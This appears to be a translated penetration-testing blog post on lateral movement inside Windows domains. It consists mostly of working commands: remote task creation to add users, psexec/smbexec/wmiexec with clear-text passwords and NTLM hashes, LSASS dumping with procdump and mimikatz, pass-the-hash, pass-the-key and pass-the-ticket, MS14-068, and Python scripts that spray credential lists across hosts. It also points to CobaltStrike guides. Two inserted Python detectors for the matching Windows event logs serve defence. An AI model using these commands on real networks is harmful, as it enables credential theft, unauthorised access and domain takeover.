0x00 Summary: two ways of moving laterally in an intranet
There are two ways to move laterally in an intranet: credential delivery and vulnerability exploitation.
Delivery uses a set of built-in protocols and commands to reach other intranet hosts.
For example:
at, schtasks,
psexec, smbexec,
wmic, wmiexec,
PTH, PTT, PTK,
winrs, winrm, RDP, SPN, etc., to penetrate other intranet hosts.
Tools: CobaltStrike, Ladon, etc.
Vulnerability-based movement exploits a vulnerability (a CVE) in the host or another component to penetrate the host.
For example:
CVE-2014-6324
CVE-201717010
CVE-2020-1472, etc., to penetrate other intranet hosts.
0x01 Lateral movement: at and schtasks delivery
Prerequisite: ports 139/445 are open on the target, and the clear-text password or hash of an account on the other host has been obtained.
1) at delivery:
The at command works when the target host is older than Windows Server 2012 and the clear-text password of a target account is known; commands can then be executed directly on the remote host. First, at and sc need ports 135/445 to be open, which is generally the case; if they are not open, use another method.
Utilization process:
- Establish an IPC connection to the target host; the password of an account on the other host must be known. Permission errors occur if the account is not privileged enough.
- Copy the command script to the target host.
- Check the target's time and create a scheduled task (at or schtasks) that runs the copied script at a set time.
- Delete the IPC connection.
Establish the IPC connection:
net use \\192.168.213.163\ipc$ "123.com" /user:hsyy.com\administrator
Create user.bat locally; it contains the command to run on the other host's C drive:
net user haha 123.com /add
Upload the file to the other host's C drive:
copy user.bat \\192.168.213.163\c$
Add a task on the other host that executes it:
at \\192.168.213.163 12:20 c:\user.bat
Wait and see the other host add user haha.
Detailed steps: set up the connection
Copy the file to the other host and add the scheduled task
Verify that the user was added successfully
Common error codes when establishing IPC:
(1) 5: Access is denied; the user used is probably not an administrator and needs to be elevated first
(2) 51: Network problem; Windows cannot find the network path
(3) 53: Network path not found; possibly a wrong IP address, the target is not powered on, the target's Lanmanserver service is not started, or a firewall issue
(4) 67: Network name not found; the local Lanmanworkstation service is not started, or the target has deleted the ipc$ share
(5) 1219: The provided credentials conflict with an existing credential set, meaning an IPC$ connection is already established and must be deleted first
(6) 1326: Wrong account or password
(7) 1792: The target's NetLogon service is not started, which often happens when connecting to a domain controller
(8) 2242: The user password has expired; the target's account policy forces periodic password changes
Reasons an IPC connection fails to establish:
(1) The target system is not NT or a later operating system
(2) The other party has not enabled the IPC$ share
(3) The other party has not opened ports 139 or 445, or they are blocked by a firewall
(4) Error in the typed command, account or password
2) schtasks delivery:
schtasks is used where at is not available, i.e. the other host is Windows Server 2012 or later; sc likewise supports 2012 and later versions.
Utilization process:
Establish the IPC connection:
net use \\192.168.213.163\ipc$ "123.com" /user:hsyy.com\administrator
Copy the script bat file:
copy user.bat \\192.168.213.163\c$
Create the adduser task pointing at the file to execute:
schtasks /create /s 192.168.213.163 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\user.bat /F
Run the task:
schtasks /run /s 192.168.213.163 /tn adduser /i
Delete the task:
schtasks /delete /s 192.168.213.163 /tn adduser /f
3) atexec.exe lateral movement with hash delivery:
atexec is readily flagged by antivirus, so in practice it needs AV evasion.
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator  #Batch check which IPs accept the clear-text password (IPC connection)
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami  #Batch check which IPs accept the clear-text password (version with echo)
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami  #Batch check which clear-text passwords work for one IP (version with echo)
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami  #Batch check which hashes work for one IP (version with echo)
4) Python batch check of IPs, passwords and accounts (which combinations are alive):
Generate the exe file:
File location:
Package it as an exe with pyinstaller and run the file. Batch detection uses the collected domain IP information and the account/password information as the dictionary:
    import os, time

    ips = {'192.168.213.163', '192.168.213.100', '192.168.213.120', '192.168.213.132'}
    users = {'administrator', 'user', 'haha', 'Administrator', 'lily'}
    passs = {'admin', '123.com', '', '123456'}

    for ip in ips:
        for user in users:
            for mima in passs:
                # net use \\ip\ipc$ password /user:hsyy.com\user
                cmd = "net use \\\\" + ip + "\\ipc$ " + mima + " /user:hsyy.com\\" + user
                print('--->' + cmd + '--->')
                os.system(cmd)
                time.sleep(1)
0x02 Lateral movement: SMB-based psexec and smbexec delivery
psexec and smbexec connect over the SMB service; port 445 must be open, and a clear-text password or hash is needed.
First, procdump and mimikatz are used to obtain the clear-text password and hash of the local machine.
Install procdump: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
Generate the lsass.dmp file: procdump -accepteula -ma lsass.exe lsass.dmp
Extract the passwords with mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
1) psexec delivery:
The first method establishes an IPC connection and then delivers clear text or a hash; administrator privileges on the other host are required, otherwise an error occurs.
psexec is an official Microsoft tool and is not flagged by AV: https://docs.microsoft.com/en-us/sysinternals/downloads/pstools
Establish the IPC connection:
net use \\192.168.213.163\ipc$ "123.com" /user:administrator
Use psexec to get a cmd window back:
psexec \\192.168.213.163 -s cmd
Second method: supply the clear-text account and password without setting up IPC first.
Delete the IPC connection: net use * /delete
Direct clear-text connection:
psexec \\192.168.213.163 -u administrator -p 123.com -s cmd
Hash connection:
psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
The official PsTools psexec cannot pass a hash; the impacket toolkit is needed for that, which is easy to use but is easily flagged by AV.
2) smbexec delivery
No IPC connection needs to be established first; clear text or hash delivery.
This uses the impacket toolkit.
exe download address: https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip
py version: https://github.com/SecureAuthCorp/impacket
Clear-text delivery:
smbexec hsyy.com/administrator:123.com@192.168.213.163
Hash delivery:
smbexec -hashes :$HASH$ ./admin@192.168.213.163
smbexec -hashes :$HASH$ domain/admin@192.168.213.163
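From the defender's side, the at/schtasks and psexec/smbexec delivery in 0x01 and 0x02 leaves a recognisable trail in the Windows Security and System logs: a network logon (4624, type 3), admin-share access (5140 on IPC$ and then C$ or ADMIN$), and a scheduled task creation (4698) or a PSEXESVC service install (7045). The following added Python example, not from the original post, correlates constructed events of that shape by logon ID; the field names are simplified assumptions, not the exact event XML schema.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names are simplified:
# 4624 (logon) carries the source IP and the new LogonId; 5140 (share
# access) and 4698 (task created) carry that LogonId in their Subject;
# 7045 (service installed, System log) carries only the service name.
SAMPLE_EVENTS = [
    {"t": "2021-08-20 12:18:01", "id": 4624, "logon_id": "0x3e7a1", "src": "192.168.213.100", "logon_type": 3},
    {"t": "2021-08-20 12:18:02", "id": 5140, "logon_id": "0x3e7a1", "share": r"\\*\IPC$"},
    {"t": "2021-08-20 12:18:05", "id": 5140, "logon_id": "0x3e7a1", "share": r"\\*\C$"},
    {"t": "2021-08-20 12:19:40", "id": 4698, "logon_id": "0x3e7a1", "task": r"\adduser"},
    {"t": "2021-08-20 13:02:11", "id": 4624, "logon_id": "0x41b22", "src": "192.168.213.50", "logon_type": 3},
    {"t": "2021-08-20 13:02:12", "id": 5140, "logon_id": "0x41b22", "share": r"\\*\IPC$"},
    {"t": "2021-08-20 14:30:00", "id": 7045, "service": "PSEXESVC", "path": r"%SystemRoot%\PSEXESVC.exe"},
]

ADMIN_SHARES = {r"\\*\C$", r"\\*\ADMIN$"}  # IPC$ alone is too noisy to alert on

def _ts(e):
    return datetime.strptime(e["t"], "%Y-%m-%d %H:%M:%S")

def detect_smb_lateral_movement(events, window_minutes=5):
    """Alert on (a) a network logon session that reads an admin share and then
    creates a scheduled task within the window (at/schtasks delivery) and
    (b) a PSEXESVC service install, the footprint psexec leaves on the target."""
    alerts = []
    logons = {e["logon_id"]: e for e in events if e["id"] == 4624 and e["logon_type"] == 3}
    for e in events:
        if e["id"] == 4698 and e["logon_id"] in logons:
            # admin-share access by the same session shortly before the task
            prior = [s for s in events if s["id"] == 5140 and s["logon_id"] == e["logon_id"]
                     and s["share"] in ADMIN_SHARES
                     and timedelta(0) <= _ts(e) - _ts(s) <= timedelta(minutes=window_minutes)]
            if prior:
                alerts.append({"rule": "share-then-task", "src": logons[e["logon_id"]]["src"],
                               "share": prior[-1]["share"], "task": e["task"]})
        elif e["id"] == 7045 and e["service"].upper() == "PSEXESVC":
            alerts.append({"rule": "psexec-service", "service": e["service"], "path": e["path"]})
    return alerts

if __name__ == "__main__":
    for a in detect_smb_lateral_movement(SAMPLE_EVENTS):
        print(a)
```

The second session above only touches IPC$ and creates no task, so it produces no alert; shortening the window below 95 seconds drops the task alert as well.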
0x03 Lateral movement: WMI-based wmic and wmiexec delivery
The port 135 service must be open. Supports clear-text and hash delivery, and leaves no trace in the log.
1) wmic delivery
1. Clear-text delivery without echo
Create the process; the output has to be read back from a file on the other host:
wmic /node:192.168.213.163 /user:administrator /password:123.com process call create "cmd.exe /c ipconfig >C:\1.txt"
Read the value:
2. Clear-text delivery with echo requires the wmiexec.vbs file:
cscript //nologo wmiexec.vbs /shell 192.168.213.163 administrator 123.com
3. Clear-text or hash delivery with echo, using the exe version of impacket's wmiexec, which may be flagged by AV
Toolkit address: https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip
Workgroup environment:
wmiexec ./account:Password@192.168.3.32 "whoami"
Domain environment:
wmiexec god/administrator:123.com@192.168.3.21 "whoami"
Hash delivery:
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.213.163 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.213.163 "whoami"
List the C drive:
wmiexec hsyy.com/administrator:123.com@192.168.213.163 "dir /c"
Python batch detection, looping over accounts and password hashes:
Export an exe with Python's pyinstaller module: pyinstaller.exe -F fuck_neiwang_002.py
EXP:
    import os, time

    ips = {'192.168.3.21', '192.168.3.25', '192.168.3.29', '192.168.3.30', '192.168.3.32'}
    users = {'Administrator', 'boss', 'dbadmin', 'fileadmin', 'mack', 'mary', 'webadmin'}
    hashs = {'ccef208c6485269c20db2cad21734fe7', '518b98ad4178a53695dc997aa02d455c'}

    for ip in ips:
        for user in users:
            for mimahash in hashs:
                # wmiexec -hashes :hash god/user@ip whoami
                cmd = "wmiexec -hashes :" + mimahash + " god/" + user + "@" + ip + " whoami"
                print('--->' + cmd + '<---')
                os.system(cmd)
                time.sleep(0.5)
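As an added detection-side example (not from the original post), the wmic/wmiexec delivery above is visible once process-creation auditing with command lines is enabled (Security 4688 with command-line logging, or Sysmon event 1): cmd.exe spawned by WmiPrvSE.exe, output redirected to a file as in the no-echo wmic command, and impacket wmiexec's output file under \\127.0.0.1\ADMIN$\__<timestamp>. The records are constructed and the field names are simplified assumptions.

```python
import re

# Constructed sample process-creation records (4688 / Sysmon 1 style, not
# real logs): parent image, new process image and its command line.
SAMPLE_PROCS = [
    # no-echo wmic delivery: output redirected to a file on the target
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c ipconfig >C:\1.txt"},
    # impacket wmiexec: output written to ADMIN$\__<timestamp> via loopback
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1629456789.12 2>&1"},
    # benign WMI provider child (constructed inventory agent)
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": r"C:\Program Files\Agent\inventory.exe",
     "cmdline": r'"C:\Program Files\Agent\inventory.exe" --scan'},
    # same redirect, but started by a user from explorer: not WMI delivery
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c ipconfig >C:\1.txt"},
]

SHELLS = {"cmd.exe", "powershell.exe"}
WMI_HOST = "wmiprvse.exe"
WMIEXEC_OUTPUT = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.IGNORECASE)
REDIRECT = re.compile(r">\s*[A-Za-z\\]")  # stdout sent to a path, not 2>&1

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify_wmi_process(rec):
    """Tags for one record; an empty list means nothing WMI-delivery-like."""
    tags = []
    if _basename(rec["parent"]) != WMI_HOST or _basename(rec["image"]) not in SHELLS:
        return tags
    tags.append("wmi-spawned-shell")
    if WMIEXEC_OUTPUT.search(rec["cmdline"]):
        tags.append("wmiexec-admin$-output")
    elif REDIRECT.search(rec["cmdline"]):
        tags.append("stdout-redirected-to-file")
    return tags

def detect_wmi_delivery(records):
    """Return (command line, tags) for every record that gets at least one tag."""
    hits = []
    for r in records:
        tags = classify_wmi_process(r)
        if tags:
            hits.append((r["cmdline"], tags))
    return hits
```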
0x04 Lateral movement: PTH, PTK and PTT delivery
When using these three techniques, note the following: for PTH delivery, when patch KB2871997 is installed on the other host, PTH with mimikatz can only connect as domain users, not users of other groups. PTK delivery requires patch KB2871997 on the other host; PTK can then connect as domain users or groups, using an AES256 key. PTH and PTK delivery are based on NTLM authentication, while PTT delivery is based on the Kerberos protocol.
Summary:
1) PTH with mimikatz:
With the patch installed, NTLM delivery:
Elevate: privilege::debug
NTLM delivery:
sekurlsa::pth /user:administrator /domain:hsyy.com /ntlm:ccef208c6485269c20db2cad21734fe7
NTLM intra-workgroup collision (other hosts may have an administrator account with the same hash):
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
NTLM domain user delivery:
sekurlsa::pth /user:hsyy /domain:hsyy.com /ntlm:ccef208c6485269c20db2cad21734fe7
2) PTK with mimikatz (patch KB2871997 is required on the other host):
Obtain the aes256_hmac key with mimikatz:
sekurlsa::ekeys
Delivery connection:
sekurlsa::pth /user:mary /domain:hsyy.com /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b
3) PTT via MS14-068:
MS14-068 lets an ordinary domain user obtain SYSTEM privileges on the domain controller.
Steps to take control (MS14-068, executed from PowerShell):
1. View the current SID: whoami /user
2. Clear all credentials on the current machine; any existing domain member credentials would interfere with the forged credential: mimikatz # kerberos::purge
3. View the current machine's credentials: mimikatz # kerberos::list
4. Inject the ticket into memory: mimikatz # kerberos::ptc <ticket file>
5. Generate the TGT data with ms14-068: ms14-068.exe -u <domain member name>@<domain name> -s <sid> -d <domain controller address> -p <domain member password>
6. Inject it into memory: run mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit
7. View the ticket list: klist
8. Use the privileges: dir \\192.168.213.132\c$
Step implementation:
1. View the SID: whoami /user
2. Generate the ticket with ms14-068: ms14-068.exe -u <domain member name>@<domain name> -s <sid> -d <domain controller address> -p <domain member password>
3. Inject the ticket:
4. Connect to the domain controller and take control:
If the IP is not recognized, use the domain computer name instead.
4) PTT via kekeo:
PTT knowledge point: PTT persistence techniques: Golden ticket, Silver ticket
Steps:
1. Generate the ticket with kekeo: kekeo "tgt::ask /user:mary /domain:hsyy.com /ntlm:518b98ad4178a53695dc997aa02d455c"
2. Import the ticket: kerberos::ptt TGT_haha@HSYY.COM_krbtgt~hsyy.com@GOD.ORG.kirbi
3. View the tickets: klist
4. Access the share: dir \\192.168.213.163\c$ (or use net use)
5) PTT using local tickets with mimikatz (administrator rights required):
Elevate: privilege::debug
Export the tickets: sekurlsa::tickets /export
Use a ticket: kerberos::ptt xxxxxxxxx.xxxx.kirbi
6) Recommended tool, Ladon:
Ladon, a domestic intranet tool, tested and evaluated
Functions: information collection, protocol scanning, vulnerability probing, delivery attacks, etc.
Address: https://github.com/k8gege/Ladon
0x05 Lateral movement: RDP and SPN scanning
1) RDP delivery:
RDP is similar to SSH remote connection on Linux: knowing the other side's IP, account and password is enough to connect.
Port 3389 must be open.
Run from cmd: mstsc
Clear-text delivery
Hash delivery over RDP is of limited practical value.
2) SPN scanning:
When a computer joins a domain, its primary SPN is automatically added to the ServicePrincipalName attribute of the domain computer account. When a new service is installed, its SPN is likewise recorded in the appropriate attribute of the computer account.
SPN scanning is also called Kerberos service instance name scanning. It is the best way to discover services in Active Directory: it finds services by requesting service principal names of a specific SPN type. Its main feature, compared with network port scanning, is that it is unnecessary to check service ports by connecting to every IP address in the network, so it does not trigger large numbers of alerts from rules on devices such as IPS/IDS inside the intranet.
Because SPN queries are part of normal Kerberos ticket behavior, they are difficult to detect.
Since SPN scanning queries the domain controller over LDAP, an attacker only needs ordinary domain user privileges to perform it.
0x06 Lateral movement: CobaltStrike
Usage process:
1. Start - configure - listener - execute - beacon comes online - information collection (network, credentials, location, etc.) - penetrate
2. About startup and configuration
3. About coming online and plug-in loading
4. About information collection commands
5. About views and automation
Installation and use: http://www.kxsy.work/2021/08/05/shen-tou-shen-qi-cs-an-zhuang-xiang-xi-jiao-cheng/
Domain penetration reference: http://www.kxsy.work/2021/08/17/strike-yu-shen-tou/
CS 4.0 manual:
Link: https://pan.baidu.com/s/1knqCFSZ2VxUKKAGE6INRiw
Extraction code: hsyy
Communication and learning:
Blog: www.kxsy.work
CSDN community: Addressing Fever